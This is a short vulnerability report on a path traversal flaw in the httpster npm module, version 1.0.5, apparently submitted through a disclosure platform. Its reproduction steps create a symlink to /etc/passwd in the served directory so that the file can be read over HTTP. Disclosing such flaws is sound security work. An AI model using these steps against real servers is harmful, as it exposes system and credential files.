Path Traversal in simbco/httpster
Aug 14th 2020
I would like to report a Path Traversal vulnerability in the httpster module. It allows an attacker to read system files via a Path Traversal vulnerability. With a symbolically linked file in the working directory, it is possible to read arbitrary files outside of the web root directory.
Module name: httpster Version: 1.0.5 (latest)
Simple http server for quick loading of content.
Install the httpster module
$ npm -g install httpster
Make a directory
$ mkdir test
Go to 'test' directory
$ cd test
Create a symlink file
ln -s /etc/passwd 'filename'
Run httpster module
Request the file within browser
This could have enabled an attacker to view system files and leverage attacks like remote code execution.